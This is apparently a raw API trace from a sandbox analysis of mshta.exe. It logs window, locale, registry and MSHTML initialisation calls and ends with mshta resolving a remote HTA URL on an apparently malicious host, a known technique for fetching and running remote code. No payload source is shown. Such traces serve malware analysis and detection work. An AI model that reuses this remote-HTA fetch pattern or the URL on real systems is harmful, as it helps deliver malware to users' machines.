[0063.577] CreateWindowExW (dwExStyle=0x0, lpClassName=0xc197, lpWindowName=0x0, dwStyle=0x80000000, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0x7fee0880000, lpParam=0x0) returned 0x10202
[0063.577] GetWindowLongW (hWnd=0x10202, nIndex=-20) returned 0
[0063.577] NtdllDefWindowProc_W () returned 0x1
[0063.577] NtdllDefWindowProc_W () returned 0x0
[0063.577] NtdllDefWindowProc_W () returned 0x0
[0063.578] NtdllDefWindowProc_W () returned 0x0
[0063.578] NtdllDefWindowProc_W () returned 0x0
[0063.578] CreateCompatibleDC (hdc=0x0) returned 0x120108ca
[0063.578] GetDeviceCaps (hdc=0x120108ca, index=90) returned 96
[0063.578] GetDeviceCaps (hdc=0x120108ca, index=88) returned 96
[0063.578] GetSystemMetrics (nIndex=68) returned 4
[0063.578] GetSystemMetrics (nIndex=69) returned 4
[0063.578] GetSystemMetrics (nIndex=2) returned 17
[0063.578] GetSystemMetrics (nIndex=3) returned 17
[0063.578] GetStockObject (i=13) returned 0x18a002e
[0063.578] SelectObject (hdc=0x120108ca, h=0x18a002e) returned 0x18a002e
[0063.578] GetTextMetricsW (in: hdc=0x120108ca, lptm=0x2ae210 | out: lptm=0x2ae210) returned 1
[0063.578] SelectObject (hdc=0x120108ca, h=0x18a002e) returned 0x18a002e
[0063.578] DeleteObject (ho=0x18a002e) returned 1
[0063.578] GetSystemDefaultLCID () returned 0x409
[0063.578] GetUserDefaultLCID () returned 0x409
[0063.578] GetACP () returned 0x4e4
[0063.578] GetLocaleInfoW (in: Locale=0x400, LCType=0x1014, lpLCData=0x2ae160, cchData=41 | out: lpLCData="1") returned 2
[0063.578] _wtoi (_String="1") returned 1
[0063.578] RegCloseKey (hKey=0x0) returned 0x6
[0063.578] GetLocaleInfoW (in: Locale=0x400, LCType=0x13, lpLCData=0x2ae140, cchData=16 | out: lpLCData="0123456789") returned 11
[0063.578] SystemParametersInfoW (in: uiAction=0x46, uiParam=0x0, pvParam=0x7fee10469c4, fWinIni=0x0 | out: pvParam=0x7fee10469c4) returned 1
[0063.578] SystemParametersInfoW (in: uiAction=0x42, uiParam=0x10, pvParam=0x2ae200, fWinIni=0x0 | out: pvParam=0x2ae200) returned 1
[0063.578] GetSystemWindowsDirectoryW (in: lpBuffer=0x2ae030, uSize=0x104 | out: lpBuffer="C:\\Windows") returned 0xa
[0063.578] lstrlenW (lpString="C:\\Windows") returned 10
[0063.578] lstrlenW (lpString="\\WindowsShell.manifest") returned 22
[0063.578] CreateActCtxW (pActCtx=0x2adff0) returned 0x3bb908
[0063.579] ActivateActCtx (in: hActCtx=0x3bb908, lpCookie=0x2adfa8 | out: hActCtx=0x3bb908, lpCookie=0x2adfa8) returned 1
[0063.580] LoadLibraryW (lpLibFileName="comctl32.dll") returned 0x7fefc060000
[0063.583] DeactivateActCtx (dwFlags=0x0, ulCookie=0x1001f08500000001) returned 1
[0063.583] GetProfileIntA (lpAppName="windows", lpKeyName="DragScrollInset", nDefault=11) returned 0xb
[0063.583] GetProfileIntA (lpAppName="windows", lpKeyName="DragScrollDelay", nDefault=50) returned 0x32
[0063.583] GetProfileIntA (lpAppName="windows", lpKeyName="DragDelay", nDefault=200) returned 0xc8
[0063.584] GetProfileIntA (lpAppName="windows", lpKeyName="DragScrollInterval", nDefault=50) returned 0x32
[0063.584] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x2ae190, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\mshta.exe" (normalized: "c:\\windows\\system32\\mshta.exe")) returned 0x1d
[0063.584] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2ade70, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\mshta.exe" (normalized: "c:\\windows\\system32\\mshta.exe")) returned 0x1d
[0063.584] GetCurrentProcess () returned 0xffffffffffffffff
[0063.584] GetModuleBaseNameW (in: hProcess=0xffffffffffffffff, hModule=0x0, lpBaseName=0x2adc60, nSize=0x104 | out: lpBaseName="mshta.exe") returned 0x9
[0063.584] PathFindFileNameW (pszPath="C:\\Windows\\System32\\mshta.exe") returned="mshta.exe"
[0063.584] FindAtomW (lpString="TridentEnableHiRes") returned 0x0
[0063.585] SHGetValueW (in: hkey=0xffffffff80000001, pszSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer", pszValue="NoFileMenu", pdwType=0x2adc58, pvData=0x2adc54, pcbData=0x2adc50*=0x4 | out: pdwType=0x2adc58*=0x0, pvData=0x2adc54, pcbData=0x2adc50*=0x4) returned 0x2
[0063.585] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x2adb48 | out: phkResult=0x2adb48*=0x1cc) returned 0x0
[0063.585] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x2adb50 | out: phkResult=0x2adb50*=0x1c8) returned 0x0
[0063.585] RegOpenKeyExW (in: hKey=0x1c8, lpSubKey="FEATURE_MANAGE_SCRIPT_CIRCULAR_REFS", ulOptions=0x0, samDesired=0x1, phkResult=0x2adad8 | out: phkResult=0x2adad8*=0x0) returned 0x2
[0063.585] RegOpenKeyExW (in: hKey=0x1cc, lpSubKey="FEATURE_MANAGE_SCRIPT_CIRCULAR_REFS", ulOptions=0x0, samDesired=0x1, phkResult=0x2adad8 | out: phkResult=0x2adad8*=0x0) returned 0x2
[0063.585] RegCloseKey (hKey=0x0) returned 0x6
[0063.585] RegCloseKey (hKey=0x0) returned 0x6
[0063.585] RegCloseKey (hKey=0x1cc) returned 0x0
[0063.585] RegCloseKey (hKey=0x1c8) returned 0x0
[0063.586] MulDiv (nNumber=1073741823, nNumerator=96, nDenominator=1440) returned 71582788
[0063.586] MulDiv (nNumber=1073741823, nNumerator=96, nDenominator=1440) returned 71582788
[0063.586] MulDiv (nNumber=1073741823, nNumerator=96, nDenominator=1440) returned 71582788
[0063.586] MulDiv (nNumber=1073741823, nNumerator=96, nDenominator=1440) returned 71582788
[0063.586] GetCurrentThreadId () returned 0xbc4
[0063.586] RegisterClipboardFormatW (lpszFormat="WM_HTML_GETOBJECT") returned 0xc198
[0063.612] CoInternetIsFeatureEnabled (FeatureEntry=0xc, dwFlags=0x2) returned 0x1
[0063.612] CoInternetCreateSecurityManager (in: pSP=0x0, ppSM=0x7fee10448f8, dwReserved=0x0 | out: ppSM=0x7fee10448f8*=0x3bed80) returned 0x0
[0063.615] GetCurrentThreadId () returned 0xbc4
[0063.615] CreateUri (in: pwzURI="about:blank", dwFlags=0x2b80, dwReserved=0x0, ppURI=0x2adee0 | out: ppURI=0x2adee0*=0x3ad680) returned 0x0
[0063.615] IUri:GetPropertyDWORD (in: This=0x3ad680, uriProp=0x11, pdwProperty=0x2aded8, dwFlags=0x0 | out: pdwProperty=0x2aded8*=0x11) returned 0x0
[0063.615] CoInternetCreateSecurityManager (in: pSP=0x0, ppSM=0x3be198, dwReserved=0x0 | out: ppSM=0x3be198*=0x3c12b0) returned 0x0
[0063.615] IInternetSecurityManager:SetSecuritySite (This=0x3c12b0, pSite=0x3be1a8) returned 0x0
[0063.615] IUnknown:AddRef (This=0x3be1a8) returned 0x28
[0063.615] IUnknown:QueryInterface (in: This=0x3be1a8, riid=0x7fefe4ae970*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x2ade30 | out: ppvObject=0x2ade30*=0x3be1b0) returned 0x0
[0063.615] IServiceProvider:QueryService (in: This=0x3be1b0, guidService=0x7fefe4b17f0*(Data1=0xf1e50292, Data2=0xa795, Data3=0x4117, Data4=([0]=0x8e, [1]=0x9, [2]=0x2b, [3]=0x56, [4]=0xa, [5]=0x72, [6]=0xac, [7]=0x60)), riid=0x7fefe4b17f0*(Data1=0xf1e50292, Data2=0xa795, Data3=0x4117, Data4=([0]=0x8e, [1]=0x9, [2]=0x2b, [3]=0x56, [4]=0xa, [5]=0x72, [6]=0xac, [7]=0x60)), ppvObject=0x3c12f8 | out: ppvObject=0x3c12f8*=0x0) returned 0x80004002
[0063.620] IServiceProvider:QueryService (in: This=0x3be1b0, guidService=0x7fefe4b18b0*(Data1=0xf164edf1, Data2=0xcc7c, Data3=0x4f0d, Data4=([0]=0x9a, [1]=0x94, [2]=0x34, [3]=0x22, [4]=0x26, [5]=0x25, [6]=0xc3, [7]=0x93)), riid=0x7fefe4b18b0*(Data1=0xf164edf1, Data2=0xcc7c, Data3=0x4f0d, Data4=([0]=0x9a, [1]=0x94, [2]=0x34, [3]=0x22, [4]=0x26, [5]=0x25, [6]=0xc3, [7]=0x93)), ppvObject=0x3c12f0 | out: ppvObject=0x3c12f0*=0x0) returned 0x80004002
[0063.620] IServiceProvider:QueryService (in: This=0x3be1b0, guidService=0x7fefe4ae0b0*(Data1=0x79eac9ee, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), riid=0x7fefe4ae0b0*(Data1=0x79eac9ee, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x3c12e8 | out: ppvObject=0x3c12e8*=0x0) returned 0x80004002
[0063.620] IUnknown:Release (This=0x3be1b0) returned 0x0
[0063.620] IInternetSecurityManager:GetSecurityId (in: This=0x3c12b0, pwszUrl="about:blank", pbSecurityId=0x2adf90, pcbSecurityId=0x2adf80*=0x200, dwReserved=0x0 | out: pbSecurityId=0x2adf90*=0x61, pcbSecurityId=0x2adf80*=0xf) returned 0x0
[0063.628] DllGetClassObject (in: rclsid=0x3b9c70*(Data1=0x3050f406, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), riid=0x2ad010*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x2ac310 | out: ppv=0x2ac310*=0x7fee1044fa0) returned 0x0
[0063.629] IUnknown:AddRef (This=0x7fee1044fa0) returned 0x1
[0063.629] IUnknown:Release (This=0x7fee1044fa0) returned 0x1
[0063.629] IUnknown:QueryInterface (in: This=0x7fee1044fa0, riid=0x7fefe4a8508*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x2ad290 | out: ppvObject=0x2ad290*=0x7fee1044fa0) returned 0x0
[0063.629] IUnknown:Release (This=0x7fee1044fa0) returned 0x1
[0063.629] IUnknown:QueryInterface (in: This=0x7fee1044fa0, riid=0x7fefe4b1978*(Data1=0x79eac9ec, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x2ad7c0 | out: ppvObject=0x2ad7c0*=0x7fee1044fb8) returned 0x0
[0063.629] IUnknown:Release (This=0x7fee1044fa0) returned 0x1
[0063.629] IUnknown:Release (This=0x7fee1044fb8) returned 0x1
[0063.629] DllGetClassObject (in: rclsid=0x3b9c70*(Data1=0x3050f406, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), riid=0x7fefe4a8508*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x2ad580 | out: ppv=0x2ad580*=0x7fee1044fa0) returned 0x0
[0063.629] IUnknown:QueryInterface (in: This=0x7fee1044fa0, riid=0x7fefe4b1978*(Data1=0x79eac9ec, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x2ad7c0 | out: ppvObject=0x2ad7c0*=0x7fee1044fb8) returned 0x0
[0063.629] IUnknown:Release (This=0x7fee1044fa0) returned 0x1
[0063.629] IInternetProtocolInfo:ParseUrl (in: This=0x7fee1044fb8, pwzUrl="about:blank", ParseAction=17, dwParseFlags=0x0, pwzResult=0x3bccb0, cchResult=0xc, pcchResult=0x2ad828, dwReserved=0x0 | out: pwzResult="", pcchResult=0x2ad828*=0x0) returned 0x800c0011
[0063.629] IUnknown:Release (This=0x7fee1044fb8) returned 0x1
[0063.629] IUnknown:Release (This=0x3ad680) returned 0x2
[0063.641] CoInternetCreateSecurityManager (in: pSP=0x0, ppSM=0x2adf40, dwReserved=0x0 | out: ppSM=0x2adf40*=0x3cbf30) returned 0x0
[0063.642] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x2ae088 | out: phkResult=0x2ae088*=0x20c) returned 0x0
[0063.642] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x2ae090 | out: phkResult=0x2ae090*=0x210) returned 0x0
[0063.642] RegOpenKeyExW (in: hKey=0x210, lpSubKey="FEATURE_DOCUMENT_COMPATIBLE_MODE", ulOptions=0x0, samDesired=0x1, phkResult=0x2ae018 | out: phkResult=0x2ae018*=0x0) returned 0x2
[0063.642] RegOpenKeyExW (in: hKey=0x20c, lpSubKey="FEATURE_DOCUMENT_COMPATIBLE_MODE", ulOptions=0x0, samDesired=0x1, phkResult=0x2ae018 | out: phkResult=0x2ae018*=0x0) returned 0x2
[0063.642] RegCloseKey (hKey=0x0) returned 0x6
[0063.642] RegCloseKey (hKey=0x0) returned 0x6
[0063.642] RegCloseKey (hKey=0x20c) returned 0x0
[0063.642] RegCloseKey (hKey=0x210) returned 0x0
[0063.644] CreateUri (in: pwzURI="about:blank", dwFlags=0x2b80, dwReserved=0x0, ppURI=0x2add40 | out: ppURI=0x2add40*=0x3ad680) returned 0x0
[0063.645] DllGetClassObject (in: rclsid=0x3b9c70*(Data1=0x3050f406, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), riid=0x7fefe4a8508*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x2ad340 | out: ppv=0x2ad340*=0x7fee1044fa0) returned 0x0
[0063.645] IUnknown:QueryInterface (in: This=0x7fee1044fa0, riid=0x7fefe4b1978*(Data1=0x79eac9ec, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x2ad580 | out: ppvObject=0x2ad580*=0x7fee1044fb8) returned 0x0
[0063.645] IUnknown:Release (This=0x7fee1044fa0) returned 0x1
[0063.645] IInternetProtocolInfo:ParseUrl (in: This=0x7fee1044fb8, pwzUrl="about:blank", ParseAction=3, dwParseFlags=0x0, pwzResult=0x3bccb0, cchResult=0xc, pcchResult=0x2ad5c0, dwReserved=0x0 | out: pwzResult="about:blank", pcchResult=0x2ad5c0*=0xc) returned 0x0
[0063.645] IUnknown:Release (This=0x7fee1044fb8) returned 0x1
[0063.645] DllGetClassObject (in: rclsid=0x3b9c70*(Data1=0x3050f406, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), riid=0x7fefe4a8508*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x2ad340 | out: ppv=0x2ad340*=0x7fee1044fa0) returned 0x0
[0063.645] IUnknown:QueryInterface (in: This=0x7fee1044fa0, riid=0x7fefe4b1978*(Data1=0x79eac9ec, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x2ad580 | out: ppvObject=0x2ad580*=0x7fee1044fb8) returned 0x0
[0063.645] IUnknown:Release (This=0x7fee1044fa0) returned 0x1
[0063.645] IInternetProtocolInfo:ParseUrl (in: This=0x7fee1044fb8, pwzUrl="about:blank", ParseAction=17, dwParseFlags=0x0, pwzResult=0x3bccb0, cchResult=0xc, pcchResult=0x2ad5c4, dwReserved=0x0 | out: pwzResult="", pcchResult=0x2ad5c4*=0x0) returned 0x800c0011
[0063.645] IUnknown:Release (This=0x7fee1044fb8) returned 0x1
[0063.646] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1
[0063.646] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1
[0063.646] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1
[0063.646] IUnknown:Release (This=0x3ad680) returned 0x2
[0063.646] GetDC (hWnd=0x0) returned 0x530107fa
[0063.646] GetDeviceCaps (hdc=0x530107fa, index=88) returned 96
[0063.646] ReleaseDC (hWnd=0x0, hDC=0x530107fa) returned 1
[0063.646] MulDiv (nNumber=100000, nNumerator=96, nDenominator=96) returned 100000
[0063.648] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x2ae178 | out: phkResult=0x2ae178*=0x12c) returned 0x0
[0063.648] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x2ae180 | out: phkResult=0x2ae180*=0x20c) returned 0x0
[0063.649] RegOpenKeyExW (in: hKey=0x20c, lpSubKey="FEATURE_WEBOC_DOCUMENT_ZOOM", ulOptions=0x0, samDesired=0x1, phkResult=0x2ae108 | out: phkResult=0x2ae108*=0x0) returned 0x2
[0063.649] RegOpenKeyExW (in: hKey=0x12c, lpSubKey="FEATURE_WEBOC_DOCUMENT_ZOOM", ulOptions=0x0, samDesired=0x1, phkResult=0x2ae108 | out: phkResult=0x2ae108*=0x0) returned 0x2
[0063.649] RegCloseKey (hKey=0x0) returned 0x6
[0063.649] RegCloseKey (hKey=0x0) returned 0x6
[0063.649] RegCloseKey (hKey=0x12c) returned 0x0
[0063.649] RegCloseKey (hKey=0x20c) returned 0x0
[0063.649] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x776e0000
[0063.649] GetProcAddress (hModule=0x776e0000, lpProcName="InitializeSRWLock") returned 0x778384f0
[0063.649] GetProcAddress (hModule=0x776e0000, lpProcName="AcquireSRWLockExclusive") returned 0x77828020
[0063.649] GetProcAddress (hModule=0x776e0000, lpProcName="AcquireSRWLockShared") returned 0x778254e0
[0063.649] GetProcAddress (hModule=0x776e0000, lpProcName="ReleaseSRWLockExclusive") returned 0x77828050
[0063.649] GetProcAddress (hModule=0x776e0000, lpProcName="ReleaseSRWLockShared") returned 0x778254b0
[0063.649] RtlInitializeConditionVariable () returned 0x778254b0
[0063.664] IUnknown_QueryService (in: punk=0x7fee10426d8, guidService=0x7fee0f20508*(Data1=0xd81f90a3, Data2=0x8156, Data3=0x44f7, Data4=([0]=0xad, [1]=0x28, [2]=0x5a, [3]=0xbb, [4]=0x87, [5]=0x0, [6]=0x32, [7]=0x74)), riid=0x7fee0f20508*(Data1=0xd81f90a3, Data2=0x8156, Data3=0x44f7, Data4=([0]=0xad, [1]=0x28, [2]=0x5a, [3]=0xbb, [4]=0x87, [5]=0x0, [6]=0x32, [7]=0x74)), ppvOut=0x3bd818 | out: ppvOut=0x3bd818*=0x0) returned 0x80004005
[0063.664] IUnknown:QueryInterface (in: This=0x7fee10426d8, riid=0x7fefe7c08e0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x2af500 | out: ppvObject=0x2af500*=0x7fee1042700) returned 0x0
[0063.664] IServiceProvider:QueryService (in: This=0x7fee1042700, guidService=0x7fee0f20508*(Data1=0xd81f90a3, Data2=0x8156, Data3=0x44f7, Data4=([0]=0xad, [1]=0x28, [2]=0x5a, [3]=0xbb, [4]=0x87, [5]=0x0, [6]=0x32, [7]=0x74)), riid=0x7fee0f20508*(Data1=0xd81f90a3, Data2=0x8156, Data3=0x44f7, Data4=([0]=0xad, [1]=0x28, [2]=0x5a, [3]=0xbb, [4]=0x87, [5]=0x0, [6]=0x32, [7]=0x74)), ppvObject=0x3bd818 | out: ppvObject=0x3bd818*=0x0) returned 0x80004005
[0063.664] IUnknown:Release (This=0x7fee1042700) returned 0x1
[0063.665] IInternetSecurityManager:SetSecuritySite (This=0x3c12b0, pSite=0x3be1a8) returned 0x0
[0063.666] IUnknown:Release (This=0x3be1a8) returned 0x0
[0063.666] IUnknown:AddRef (This=0x3be1a8) returned 0x28
[0063.666] IUnknown:QueryInterface (in: This=0x3be1a8, riid=0x7fefe4ae970*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x2af580 | out: ppvObject=0x2af580*=0x3be1b0) returned 0x0
[0063.666] IServiceProvider:QueryService (in: This=0x3be1b0, guidService=0x7fefe4b17f0*(Data1=0xf1e50292, Data2=0xa795, Data3=0x4117, Data4=([0]=0x8e, [1]=0x9, [2]=0x2b, [3]=0x56, [4]=0xa, [5]=0x72, [6]=0xac, [7]=0x60)), riid=0x7fefe4b17f0*(Data1=0xf1e50292, Data2=0xa795, Data3=0x4117, Data4=([0]=0x8e, [1]=0x9, [2]=0x2b, [3]=0x56, [4]=0xa, [5]=0x72, [6]=0xac, [7]=0x60)), ppvObject=0x3c12f8 | out: ppvObject=0x3c12f8*=0x0) returned 0x80004002
[0063.666] IServiceProvider:QueryService (in: This=0x3be1b0, guidService=0x7fefe4b18b0*(Data1=0xf164edf1, Data2=0xcc7c, Data3=0x4f0d, Data4=([0]=0x9a, [1]=0x94, [2]=0x34, [3]=0x22, [4]=0x26, [5]=0x25, [6]=0xc3, [7]=0x93)), riid=0x7fefe4b18b0*(Data1=0xf164edf1, Data2=0xcc7c, Data3=0x4f0d, Data4=([0]=0x9a, [1]=0x94, [2]=0x34, [3]=0x22, [4]=0x26, [5]=0x25, [6]=0xc3, [7]=0x93)), ppvObject=0x3c12f0 | out: ppvObject=0x3c12f0*=0x0) returned 0x80004002
[0063.666] IServiceProvider:QueryService (in: This=0x3be1b0, guidService=0x7fefe4ae0b0*(Data1=0x79eac9ee, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), riid=0x7fefe4ae0b0*(Data1=0x79eac9ee, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x3c12e8 | out: ppvObject=0x3c12e8*=0x7fee1042708) returned 0x0
[0063.666] IUnknown:Release (This=0x3be1b0) returned 0x0
[0063.666] CoTaskMemAlloc (cb=0x6d) returned 0x395340
[0063.666] CoTaskMemAlloc (cb=0x9) returned 0x3bcdb0
[0063.669] StrChrW (lpStart="HTA", wMatch=0x3b) returned 0x0
[0063.676] IsCharSpaceW (wch=0x48) returned 0
[0063.676] IsCharAlphaNumericW (ch=0x5c) returned 0
[0063.676] IsCharSpaceW (wch=0x5c) returned 0
[0063.678] IsCharSpaceW (wch=0x41) returned 0
[0063.678] IsCharAlphaNumericW (ch=0x20) returned 0
[0063.678] IsCharSpaceW (wch=0x20) returned 1
[0063.678] IsCharSpaceW (wch=0x7b) returned 0
[0063.678] IsCharSpaceW (wch=0x20) returned 1
[0063.678] IsCharAlphaNumericW (ch=0x7b) returned 0
[0063.678] IsCharSpaceW (wch=0x62) returned 0
[0063.678] IsCharAlphaNumericW (ch=0x3a) returned 0
[0063.678] IsCharSpaceW (wch=0x3a) returned 0
[0063.681] IsCharAlphaNumericW (ch=0x3a) returned 0
[0063.681] IsCharSpaceW (wch=0x75) returned 0
[0063.681] IsCharAlphaNumericW (ch=0x28) returned 0
[0063.681] IsCharSpaceW (wch=0x28) returned 0
[0063.681] IsCharAlphaNumericW (ch=0x28) returned 0
[0063.681] IsCharSpaceW (wch=0x23) returned 0
[0063.681] IsCharSpaceW (wch=0x23) returned 0
[0063.681] IsCharSpaceW (wch=0x7d) returned 0
[0063.681] IsCharAlphaNumericW (ch=0x7d) returned 0
[0063.681] IsCharSpaceW (wch=0x29) returned 0
[0063.681] IsCharSpaceW (wch=0x75) returned 0
[0063.682] IsCharSpaceW (wch=0x75) returned 0
[0063.682] IsCharSpaceW (wch=0x29) returned 0
[0063.682] CoTaskMemFree (pv=0x395340)
[0063.682] CoTaskMemFree (pv=0x3bcdb0)
[0063.682] LoadLibraryA (lpLibFileName="OLEAUT32.dll") returned 0x7fefde70000
[0063.682] GetProcAddress (hModule=0x7fefde70000, lpProcName=0x6) returned 0x7fefde71320
[0063.682] StrCmpCW (pszStr1="Software\\Microsoft\\Internet Explorer", pszStr2="Software\\Microsoft\\Windows Mail\\Trident") returned -14
[0063.682] IsOS (dwOS=0x25) returned 1
[0063.682] GetSysColor (nIndex=26) returned 0xcc6600
[0063.682] IsOS (dwOS=0x25) returned 1
[0063.682] GetSysColor (nIndex=5) returned 0xffffff
[0063.682] GetSysColor (nIndex=8) returned 0x0
[0063.686] wcstol (in: _String="0,0,255", _EndPtr=0x2ae0d0, _Radix=10 | out: _EndPtr=0x2ae0d0*=",0,255") returned 0
[0063.686] wcstol (in: _String="0,255", _EndPtr=0x2ae0d0, _Radix=10 | out: _EndPtr=0x2ae0d0*=",255") returned 0
[0063.686] wcstol (in: _String="255", _EndPtr=0x2ae0d0, _Radix=10 | out: _EndPtr=0x2ae0d0*="") returned 255
[0063.686] wcstol (in: _String="128,0,128", _EndPtr=0x2ae0d0, _Radix=10 | out: _EndPtr=0x2ae0d0*=",0,128") returned 128
[0063.686] wcstol (in: _String="0,128", _EndPtr=0x2ae0d0, _Radix=10 | out: _EndPtr=0x2ae0d0*=",128") returned 0
[0063.686] wcstol (in: _String="128", _EndPtr=0x2ae0d0, _Radix=10 | out: _EndPtr=0x2ae0d0*="") returned 128
[0063.687] GetModuleHandleW (lpModuleName="EXPLORER.EXE") returned 0x0
[0063.687] GetModuleHandleW (lpModuleName="IEXPLORE.EXE") returned 0x0
[0063.687] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\PageSetup", ulOptions=0x0, samDesired=0x20019, phkResult=0x2af1d8 | out: phkResult=0x2af1d8*=0x8c) returned 0x0
[0063.687] SHGetValueW (in: hkey=0x8c, pszSubKey=0x0, pszValue="Print_Background", pdwType=0x0, pvData=0x2af1e0, pcbData=0x2af1d0*=0xa | out: pdwType=0x0, pvData=0x2af1e0, pcbData=0x2af1d0*=0xa) returned 0x2
[0063.687] RegCloseKey (hKey=0x8c) returned 0x0
[0063.695] GetAcceptLanguagesW () returned 0x0
[0063.695] GetClassNameW (in: hWnd=0x101fa, lpClassName=0x2af550, nMaxCount=10 | out: lpClassName="HTML Appl") returned 9
[0063.695] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="HTML Appl", cchCount1=9, lpString2="HH Parent", cchCount2=9) returned 3
[0063.695] GetParent (hWnd=0x101fa) returned 0x5001c
[0063.695] GetClassNameW (in: hWnd=0x5001c, lpClassName=0x2af550, nMaxCount=10 | out: lpClassName="HTML Appl") returned 9
[0063.695] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="HTML Appl", cchCount1=9, lpString2="HH Parent", cchCount2=9) returned 3
[0063.695] GetParent (hWnd=0x5001c) returned 0x0
[0063.697] IMoniker:GetDisplayName (in: This=0x395140, pbc=0x0, pmkToLeft=0x0, ppszDisplayName=0x2af668 | out: ppszDisplayName=0x2af668*="http://www.samyrai777m.p-host.in/t/t.php?thread=0") returned 0x0
